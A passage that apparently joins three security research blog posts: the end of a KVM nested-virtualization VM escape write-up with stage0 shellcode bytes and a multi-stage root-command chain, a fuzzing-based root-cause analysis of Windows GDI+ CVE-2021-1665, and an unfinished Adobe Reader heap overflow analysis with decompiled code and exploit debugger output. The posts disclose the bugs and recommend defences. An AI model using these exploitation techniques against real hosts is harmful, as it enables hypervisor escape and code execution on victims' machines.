A couple of years ago, the Linux physmap was still mapped executable and executing our own code would be as simple as jumping to a physmap mapping of one of our guest pages. Of course, that is not possible anymore and the kernel tries hard to not have any memory pages mapped as writable and executable. Still, page protections only apply to virtual memory accesses so why not use an instruction that directly writes controlled data to a physical address? As you might remember from our initial discussion of SVM earlier in this chapter, SVM supports an instruction called VMSAVE to store hidden guest state (or host state) in a VMCB. Similar to VMRUN, VMSAVE takes a physical address to a VMCB stored in the RAX register as an implicit argument. It then writes the following register state to the VMCB:

  • FS, GS, TR, LDTR
  • KernelGsBase
  • STAR, LSTAR, CSTAR, SFMASK
  • SYSENTER_CS, SYSENTER_ESP, SYSENTER_EIP

For us, VMSAVE is interesting for a couple of reasons:

  • It is used as part of KVM’s normal SVM exit handler and can be easily integrated into a minimal ROP chain.
  • It operates on physical addresses, so we can use it to write to an arbitrary memory location including KVM’s own code.
  • All written registers still contain the guest values set by our VM, allowing us to control the written content with some restrictions

VMSAVE’s biggest downside as an exploitation primitive is that RAX needs to be page aligned, reducing our control of the target address. VMSAVE writes to the memory offsets 0x440-0x480 and 0x600-0x638 so we need to be careful about not corrupting any memory that’s in use.

In our case this turns out to be a non-issue, as KVM contains a couple of code pages where functions that are rarely or never used (e.g cleanup_module or SEV specific code) are stored at these offsets.

While we don’t have full control over the written data and valid register values are somewhat restricted, it is still possible to write a minimal stage0 shellcode to an arbitrary page in the host kernel by filling guest MSRs with the right values. My exploit uses the STAR, LSTAR and CSTAR registers for this which are written to the physical offsets 0x400, 0x408 and 0x410. As all three registers need to contain canonical addresses, we can only use parts of the registers for our shellcode and use relative jumps to skip the unusable parts of the STAR and LSTAR MSRs:

  // mov cr0, rbx; jmp

  wrmsr(MSR_STAR, 0x00000003ebc3220f);

  // pop rdi; pop rsi; pop rcx; jmp

  wrmsr(MSR_LSTAR, 0x00000003eb595e5fULL);

  // rep movsb; pop rdi; jmp rdi;

  wrmsr(MSR_CSTAR, 0xe7ff5fa4f3);

The above code makes use of the fact that we control the value of the RBX register and the stack when we return to it as part of our initial ROP chain. First, we copy the value of RBX (0x80040033) into CR0, which disables Write Protection (WP) for kernel memory accesses. This makes all of the kernel code writable on this CPU allowing us to copy a larger stage1 shellcode to an arbitrary unused memory location and jump to it.

Once the WP bit in cr0 is disabled and the stage1 payload executes, we have a wide range of options. For my proof-of-concept exploit I decided on a somewhat boring but easy-to-implement approach to spawn a random user space command: The host is still in a very weird state so our stage1 payload can’t directly call into other kernel functions, but we can easily backdoor a function pointer which will be called at some later point in time. KVM uses the kernel’s global workqueue feature to regularly synchronize a VM’s clock between different vCPUs. The function pointer responsible for this work is stored in the (per VM) kvm->arch data structure as kvm->arch.kvmclock_update_work. The stage1 payload overrides this function pointer with the address of a stage2 payload. To put the host into a usable state it then sets the VM_HSAVE_PA MSR back to its original value and restores RSP and RIP to call the original vmexit handler.

The final stage2 payload executes at some later point in time as part of the kernel global work queue and uses the call_usermodehelper to run an arbitrary command with root privileges.

Let’s put all of this together and walk through the attacks step-by-step:

  1. Prepare the stage0 payload by splitting it up and setting the right guest MSRs.
  2. Trigger the TOCTOU vulnerability in nested_svm_vmrun and free the MSR permission bitmap by disabling the SVME bit in the EFER MSR.
  3. Wait for the pages to be reused and initialized to 0 to get unrestricted MSR access.
  4. Prepare a fake host save area, a stack for the initial ROP chain and a staging memory area for the stage1 and stage2 payloads.
  5. Leak the HPA of the host save area, the HVA addresses of the stack and staging page and the kvm-amd.ko’s base address using the different IBS infoleaks.
  6. Redirect execution to the VMSAVE gadget by setting RIP, RSP and RAX in the fake host save area, pointing the VM_HSAVE_PA MSR at it and triggering a VM exit.
  7. VMSAVE writes the stage0 payload to an unused offset in kvm-amd’s code segment, when the gadget returns stage0 gets executed.
  8. stage0 disables Write Protection in CR0 and overwrites an unused executable memory location with the stage1 and stage2 payloads, before jumping to stage1.
  9. stage1 overwrites kvm->arch.kvmclock_update_work.work.func with a pointer to stage2 before restoring the original host context.
  10. At some later point in time kvm->arch.kvmclock_update_work.work.func is called as part of the global kernel work_queue and stage2 spawns an arbitrary command using call_usermodehelper.

Interested readers should take a look at the heavily documented proof-of-concept exploit for the actual implementation.

Conclusion

This blog post describes a KVM-only VM escape made possible by a small bug in KVM’s AMD-specific code for supporting nested virtualization. Luckily, the feature that made this bug exploitable was only included in two kernel versions (v5.10, v5.11) before the issue was spotted, reducing the real-life impact of the vulnerability to a minimum. The bug and its exploit still serve as a demonstration that highly exploitable security vulnerabilities can still exist in the very core of a virtualization engine, which is almost certainly a small and well audited codebase. While the attack surface of a hypervisor such as KVM is relatively small from a pure LoC perspective, its low level nature, close interaction with hardware and pure complexity makes it very hard to avoid security-critical bugs.

While we have not seen any in-the-wild exploits targeting hypervisors outside of competitions like Pwn2Own, these capabilities are clearly achievable for a well-financed adversary. I’ve spent around two months on this research, working as an individual with only remote access to an AMD system. Looking at the potential ROI on an exploit like this, it seems safe to assume that more people are working on similar issues right now and that vulnerabilities in KVM, Hyper-V, Xen or VMware will be exploited in-the-wild sooner or later. 

What can we do about this? Security engineers working on Virtualization Security should push for as much attack surface reduction as possible. Moving complex functionality to memory-safe user space components is a big win even if it does not help against bugs like the one described above. Disabling unneeded or unreviewed features and performing regular in-depth code reviews for new changes can further reduce the risk of bugs slipping by.

Hosters, cloud providers and other enterprises that are relying on virtualization for multi-tenancy isolation should design their architecture in way that limits the impact of an attacker with an VM escape exploit:

  • Isolation of VM hosts: Machines that host untrusted VMs should be considered at least partially untrusted. While a VM escape can give an attacker full control over a single host, it should not be easily possible to move from one compromised host to another. This requires that the control plane and backend infrastructure is sufficiently hardened and that user resources like disk images or encryption keys are only exposed to hosts that need them. One way to limit the impact of a VM escape even further is to only run VMs of a specific customer or of a certain sensitivity on a single machine.
  • Investing in detection capabilities: In most architectures, the behavior of a VM host should be very predictable, making a compromised host stick out quickly once an attacker tries to move to other systems. While it’s very hard to rule out the possibility of a vulnerability in your virtualization stack, good detection capabilities make life for an attacker much harder and increase the risk of quickly burning a high-value vulnerability. Agents running on the VM host can be a first (but bypassable) detection mechanism, but the focus should be on detecting unusual network communication and resource accesses.

Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+

28 June 2021 at 19:44
Consejos para protegerte de quienes intentan hackear tus correos electrónicos

Introduction

Microsoft Windows Graphics Device Interface+, also known as GDI+, allows various applications to use different graphics functionality on video displays as well as printers. Windows applications don’t directly access graphics hardware such as device drivers, but they interact with GDI, which in turn then interacts with device drivers. In this way, there is an abstraction layer to Windows applications and a common set of APIs for everyone to use.

Because of its complex format, GDI+ has a known history of various vulnerabilities. We at McAfee continuously fuzz various open source and closed source software including windows GDI+. Over the last few years, we have reported various issues to Microsoft in various Windows components including GDI+ and have received CVEs for them.

In this post, we detail our root cause analysis of one such vulnerability which we found using WinAFL: CVE-2021-1665 – GDI+ Remote Code Execution Vulnerability.  This issue was fixed in January 2021 as part of a Microsoft Patch.

What is WinAFL?

WinAFL is a Windows port of a popular Linux AFL fuzzer and is maintained by Ivan Fratric of Google Project Zero. WinAFL uses dynamic binary instrumentation using DynamoRIO and it requires a program called as a harness. A harness is nothing but a simple program which calls the APIs we want to fuzz.

A simple harness for this was already provided with WinAFL, we can enable “Image->GetThumbnailImage” code which was commented by default in the code. Following is the harness code to fuzz GDI+ image and GetThumbnailImage API:

 

As you can see, this small piece of code simply creates a new image object from the provided input file and then calls another function to generate a thumbnail image. This makes for an excellent attack vector and can affect various Windows applications if they use thumbnail images. In addition, this requires little user interaction, thus software which uses GDI+ and calls GetThumbnailImage API, is vulnerable.

Collecting Corpus:

A good corpus provides a sound foundation for fuzzing. For that we can use Google or GitHub in addition to further test corpus available from various software and public EMF files which were released for other vulnerabilities. We have generated a few test files by making changes to a sample code provided on Microsoft’s site which generates an EMF file with EMFPlusDrawString and other records:

Ref: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emfplus/07bda2af-7a5d-4c0b-b996-30326a41fa57

Minimizing Corpus:

After we have collected an initial corpus file, we need to minimize it. For this we can use a utility called winafl-cmin.py as follows:

winafl-cmin.py -D D:\\work\\winafl\\DynamoRIO\\bin32 -t 10000 -i inCorpus -o minCorpus -covtype edge -coverage_module gdiplus.dll -target_module gdiplus_hardik.exe -target_method fuzzMe -nargs 2 — gdiplus_hardik.exe @@

How does WinAFL work?

WinAFL uses the concept of in-memory fuzzing. We need to provide a function name to WinAFL. It will save the program state at the start of the function and take one input file from the corpus, mutate it, and feed it to the function.

It will monitor this for any new code paths or crashes. If it finds a new code path, it will consider the new file as an interesting test case and will add it to the queue for further mutation. If it finds any crashes, it will save the crashing file in crashes folder.

The following picture shows the fuzzing flow:

Fuzzing with WinAFL:

Once we have compiled our harness program, collected, and minimized the corpus, we can run this command to fuzz our program with WinAFL:

afl-fuzz.exe -i minCorpus -o out -D D:\work\winafl\DynamoRIO\bin32 -t 20000 —coverage_module gdiplus.dll -fuzz_iterations 5000 -target_module gdiplus_hardik.exe -target_offset 0x16e0 -nargs 2 — gdiplus_hardik.exe @@

Results:

We found a few crashes and after triaging unique crashes, and we found a crash in “gdiplus!BuiltLine::GetBaselineOffset” which looks as follows in the call stack below:

As can be seen in the above image, the program is crashing while trying to read data from a memory address pointed by edx+8. We can see it registers ebx, ecx and edx contains c0c0c0c0 which means that page heap is enabled for the binary. We can also see that c0c0c0c0 is being passed as a parameter to “gdiplus!FullTextImager::RenderLine” function.

Patch Diffing to See If We Can Find the Root Cause

To figure out a root cause, we can use patch diffing—namely, we can use IDA BinDiff plugin to identify what changes have been made to patched file. If we are lucky, we can easily find the root cause by just looking at the code that was changed. So, we can generate an IDB file of patched and unpatched versions of gdiplus.dll and then run IDA BinDiff plugin to see the changes.

We can see that one new function was added in the patched file, and this seems to be a destructor for BuiltLine Object :

We can also see that there are a few functions where the similarity score is < 1 and one such function is FullTextImager::BuildAllLines as shown below:

Now, just to confirm if this function is really the one which was patched, we can run our test program and POC in windbg and set a break point on this function. We can see that the breakpoint is hit and the program doesn’t crash anymore:

Now, as a next step, we need to identify what has been changed in this function to fix this vulnerability. For that we can check flow graph of this function and we see something as follows. Unfortunately, there are too many changes to identify the vulnerability by simply looking at the diff:

The left side illustrates an unpatched dll while right side shows a patched dll:

  • Green indicates that the patched and unpatched blocks are same.
  • Yellow blocks indicate there has been some changes between unpatched and patched dlls.
  • Red blocks call out differences in the dlls.

If we zoom in on the yellow blocks we can see following:

We can note several changes. Few blocks are removed in the patched DLL, so patch diffing will alone will not be sufficient to identify the root cause of this issue. However, this presents valuable hints about where to look and what to look for when using other methods for debugging such as windbg. A few observations we can spot from the bindiff output above:

  • In the unpatched DLL, if we check carefully we can see that there is a call to “GetuntrimmedCharacterCount” function and later on there is another call to a function “SetSpan::SpanVector
  • In the patched DLL, we can see that there is a call to “GetuntrimmedCharacterCount” where a return value stored inside EAX register is checked. If it’s zero, then control jumps to another location—a destructor for BuiltLine Object, this was newly added code in the patched DLL:

So we can assume that this is where the vulnerability is fixed. Now we need to figure out following:

  1. Why our program is crashing with the provided POC file?
  2. What field in the file is causing this crash?
  3. What value of the field?
  4. Which condition in program which is causing this crash?
  5. How this was fixed?

EMF File Format:

EMF is also known as enhanced meta file format which is used to store graphical images device independently. An EMF file is consisting of various records which is of variable length. It can contain definition of various graphic object, commands for drawing and other graphics properties.

Credit: MS EMF documentation.

Generally, an EMF file consist of the following records:

  1. EMF Header – This contains information about EMF structure.
  2. EMF Records – This can be various variable length records, containing information about graphics properties, drawing order, and so forth.
  3. EMF EOF Record – This is the last record in EMF file.

Detailed specifications of EMF file format can be seen at Microsoft site at following URL:

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emf/91c257d7-c39d-4a36-9b1f-63e3f73d30ca

Locating the Vulnerable Record in the EMF File:

Generally, most of the issues in EMF are because of malformed or corrupt records. We need to figure out which record type is causing this crash. For this if we look at the call stack we can see following:

We can notice a call to function “gdiplus!GdipPlayMetafileRecordCallback

By setting a breakpoint on this function and checking parameter, we can see following:

We can see that EDX contains some memory address and we can see that parameter given to this function are: 00x00401c,0x00000000 and 0x00000044.

Also, on checking the location pointed by EDX we can see following:

If we check our POC EMF file, we can see that this data belongs to file from offset: 0x15c:

By going through EMF specification and manually parsing the records, we can easily figure out that this is a “EmfPlusDrawString” record, the format of which is shown below:

In our case:

Record Type = 0x401c EmfPlusDrawString record

Flags = 0x0000

Size = 0x50

Data size = 0x44

Brushid = 0x02

Format id = 0x01

Length = 0x14

Layoutrect = 00 00 00 00 00 00 00 00 FC FF C7 42 00 00 80 FF

String data =

Now that we have located the record that seems to be causing the crash, the next thing is to figure out why our program is crashing. If we debug and check the code, we can see that control reaches to a function “gdiplus!FullTextImager::BuildAllLines”. When we decompile this code, we can see something  like this:

The following diagram shows the function call hierarchy:

The execution flow in summary:

  1. Inside “Builtline::BuildAllLines” function, there is a while loop inside which the program allocates 0x60 bytes of memory. Then it calls the “Builtline::BuiltLine”
  2. The “Builtline::BuiltLine” function moves data to the newly allocated memory and then it calls “BuiltLine::GetUntrimmedCharacterCount”.
  3. The return value of “BuiltLine::GetUntrimmedCharacterCount” is added to loop counter, which is ECX. This process will be repeated until the loop counter (ECX) is < string length(EAX), which is 0x14 here.
  4. The loop starts from 0, so it should terminate at 0x13 or it should terminate when the return value of “GetUntrimmedCharacterCount” is 0.
  5. But in the vulnerable DLL, the program doesn’t terminate because of the way loop counter is increased. Here, “BuiltLine::GetUntrimmedCharacterCount” returns 0, which is added to Loop counter(ECX) and doesn’t increase ECX value. It allocates 0x60 bytes of memory and creates another line, corrupting the data that later leads the program to crash. The loop is executed for 21 times instead of 20.

In detail:

1. Inside “Builtline::BuildAllLines” memory will be allocated for 0x60 or 96 bytes, and in the debugger it looks as follows:

2. Then it calls “BuiltLine::BuiltLine” function and moves the data to newly allocated memory:

3. This happens in side a while loop and there is a function call to “BuiltLine::GetUntrimmedCharacterCount”.

4. Return value of “BuiltLine::GetUntrimmedCharacterCount” is stored in a location 0x12ff2ec. This value will be 1 as can be seen below:

5. This value gets added to ECX:

6. Then there is a check that determines if ecx< eax. If true, it will continue loop, else it will jump to another location:

7. Now in the vulnerable version, loop doesn’t exist if the return value of “BuiltLine::GetUntrimmedCharacterCount” is 0, which means that this 0 will be added to ECX and which means ECX will not increase. So the loop will execute 1 more time with the “ECX” value of 0x13. Thus, this will lead to loop getting executed 21 times rather than 20 times. This is the root cause of the problem here.

Also after some debugging, we can figure out why EAX contains 14. It is read from the POC file at offset: 0x174:

If we recall, this is the EmfPlusDrawString record and 0x14 is the length we mentioned before.

Later on, the program reaches to “FullTextImager::Render” function corrupting the value of EAX because it reads the unused memory:

This will be passed as an argument to “FullTextImager::RenderLine” function:

Later, program will crash while trying to access this location.

Our program was crashing while processing EmfPlusDrawString record inside the EMF file while accessing an invalid memory location and processing string data field. Basically, the program was not verifying the return value of “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function and this resulted in taking a different program path that  corrupted the register and various memory values, ultimately causing the crash.

How this issue was fixed?

As we have figured out by looking at patch diff above, a check was added which determined the return value of “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function.

If the retuned value is 0, then program xor’s EBX which contains counter and jump to a location which calls destructor for Builtline Object:

Here is the destructor that prevents the issue:

Conclusion:

GDI+ is a very commonly used Windows component, and a vulnerability like this can affect billions of systems across the globe. We recommend our users to apply proper updates and keep their Windows deployment current.

We at McAfee are continuously fuzzing various open source and closed source library and work with vendors to fix such issues by responsibly disclosing such issues to them giving them proper time to fix the issue and release updates as needed.

We are thankful to Microsoft for working with us on fixing this issue and releasing an update.

 

 

 

 

The post Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+ appeared first on McAfee Blog.

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

28 June 2021 at 10:46

By Sergi Martinez

This post analyzes and exploits CVE-2021-21017, a heap buffer overflow reported in Adobe Acrobat Reader DC prior to versions 2021.001.20135. This vulnerability was anonymously reported to Adobe and patched on February 9th, 2021. A publicly posted proof-of-concept containing root-cause analysis was used as a starting point for this research.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL of a different encoding to the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in the copying twice the number of bytes of the source ANSI string (relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-21017

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  CHAR v6; // cl
  CHAR *v7; // ecx
  CHAR v8; // al
  CHAR v9; // dl
  CHAR *v10; // eax
  bool v11; // zf
  CHAR *v12; // eax

[Truncated]

  int iMaxLength; // [esp+D4h] [ebp-14h]
  LPCSTR v65; // [esp+D8h] [ebp-10h]
  int v66; // [esp+DCh] [ebp-Ch] BYREF
  LPCSTR v67; // [esp+E0h] [ebp-8h]
  wchar_t *v68; // [esp+E4h] [ebp-4h]

  v68 = 0;
  v65 = 0;
  v67 = 0;
  v38 = 0;
  v51 = 0;
  v63 = 0;
  v5 = 1;
  if ( !a5 )
    return 0;
  *a5 = 0;
  if ( lpString )
  {
    if ( *lpString )
    {
      v6 = lpString[1];
      if ( v6 )
      {

[1]

        if ( *lpString == (CHAR)0xFE && v6 == (CHAR)0xFF )
        {
          v7 = lpString;
          while ( 1 )
          {
            v8 = *v7;
            v9 = v7[1];
            v7 += 2;
            if ( !v8 )
              break;
            if ( !v9 || !v7 )
              goto LABEL_14;
          }
          if ( !v9 )
            goto LABEL_15;

[2]

LABEL_14:
          *a5 = -2;
          return 0;
        }
      }
    }
  }
LABEL_15:
  if ( !Source || !lpString || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_79;
  }

[3]

  iMaxLength = sub_25802A44((LPCSTR)Source) + 1;
  v10 = (CHAR *)sub_25802CD5(1, iMaxLength);
  v65 = v10;
  if ( !v10 )
  {
    *a5 = -7;
    return 0;
  }

[4]

  sub_25802D98((wchar_t *)v10, Source, iMaxLength);
  if ( *lpString != (CHAR)0xFE || (v11 = lpString[1] == -1, v67 = (LPCSTR)2, !v11) )
    v67 = (LPCSTR)1;

[5]

  v66 = (int)&v67[sub_25802A44(lpString)];
  v12 = (CHAR *)sub_25802CD5(1, v66);
  v67 = v12;
  if ( !v12 )
  {
    *a5 = -7;
LABEL_79:
    v5 = 0;
    goto LABEL_80;
  }

[6]

  sub_25802D98((wchar_t *)v12, (wchar_t *)lpString, v66);
  if ( !(unsigned __int16)sub_258033CD(v65, iMaxLength, a5) || !(unsigned __int16)sub_258033CD(v67, v66, a5) )
    goto LABEL_79;

[7]

  v13 = sub_25802400(v65, v31);
  if ( v13 || (v13 = sub_25802400(v67, v39)) != 0 )
  {
    *a5 = v13;
    goto LABEL_79;
  }

[Truncated]

[8]

  v23 = (wchar_t *)sub_25802CD5(1, v47 + 1 + v35);
  v68 = v23;
  if ( v23 )
  {
    if ( v35 )
    {

[9]

      sub_25802D98(v23, v36, v35 + 1);
      if ( *((_BYTE *)v23 + v35 - 1) != 47 )
      {
        v25 = sub_25818CE4(v24, (char *)v23, 47);
        if ( v25 )
          *(_BYTE *)(v25 + 1) = 0;
        else
          *(_BYTE *)v23 = 0;
      }
    }
    if ( v47 )
    {

[10]

      v26 = sub_25802A44((LPCSTR)v23);
      sub_25818BE0((char *)v23, v48, v47 + 1 + v26);
    }
    sub_25802E0C(v23, 0);
    v60 = sub_25802A44((LPCSTR)v23);
    v61 = v23;
    goto LABEL_69;
  }
  v5 = 0;
  *a4 = v47 + v35 + 1;
  *a5 = -3;
LABEL_81:
  if ( v65 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v65);
  if ( v67 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v67);
  if ( v23 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824088 + 12))(v23);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
605a7d70 55              push    ebp
0:000> dd poi(esp+4) L84
099a35f0  0068fffe 00740074 00730070 002f003a
099a3600  0067002f 006f006f 006c0067 002e0065
099a3610  006f0063 002f006d 41414141 41414141
099a3620  41414141 41414141 41414141 41414141
099a3630  41414141 41414141 41414141 41414141

[Truncated]

099a37c0  41414141 41414141 41414141 41414141
099a37d0  41414141 41414141 41414141 41414141
099a37e0  41414141 41414141 41414141 2f2f3a41
099a37f0  00000000 00680074 00730069 006f002e
0:000> du poi(esp+4)
099a35f0  ".https://google.com/䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3630  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3670  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36f0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3730  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3770  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a37b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁㩁."
099a37f0  ""
0:000> dd poi(esp+8)
0b2d30b0  61616262 61616161 61616161 61616161
0b2d30c0  61616161 61616161 61616161 61616161
0b2d30d0  61616161 61616161 61616161 61616161
0b2d30e0  61616161 61616161 61616161 61616161

[Truncated]

0b2d5480  61616161 61616161 61616161 61616161
0b2d5490  61616161 61616161 61616161 61616161
0b2d54a0  61616161 61616161 61616161 00616161
0b2d54b0  4d21fcdc 80000900 41409090 ffff4041
0:000> da poi(esp+8)
0b2d30b0  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30d0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30f0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d3110  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b2d5430  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5450  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5470  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5490  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter is a valid Unicode string. If an anomaly is found the function returns at [2]. The function sub_25802A44 at [3] computes the length of the string provided as a parameter, regardless of its encoding. The function sub_25802CD5 is an implementation of calloc which allocates an array with the amount of elements provided as the first parameter with size specified as the second parameter. The function sub_25802D98 at [4] copies a number of bytes of the string specified in the second parameter to the buffer pointed by the first parameter. Its third parameter specified the number of bytes to be copied. Therefore, at [3] and [4] the length of the base URL is computed, a new allocation of that size plus one is performed, and the base URL string is copied into the new allocation. In an analogous manner, the same operations are performed on the relative URL at [5] and [6].

The function sub_25802400, called at [7], receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [8] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [7]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Continuing with the function previously listed, at [9] the base URL is copied into the memory allocated to host the concatenation and at [10] its length is calculated and provided as a parameter to the call to sub_25818BE0. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [10] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_25818BE0(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[11]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[12]

    sub_2581894C(Destination, Source);
    result = 1;
  }
  else
  {

[13]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [11] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less or equal than the desired concatenation length minus one. If the check passes, the function sub_2581894C is called at [12]. Otherwise the strncat function at [13] is called.

The function sub_2581894C called at [12] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_2581894C(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[14]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[15]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[16]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [14] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [15]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called.

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. 

Adobe Acrobat Reader DC version 2020.013.20074 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
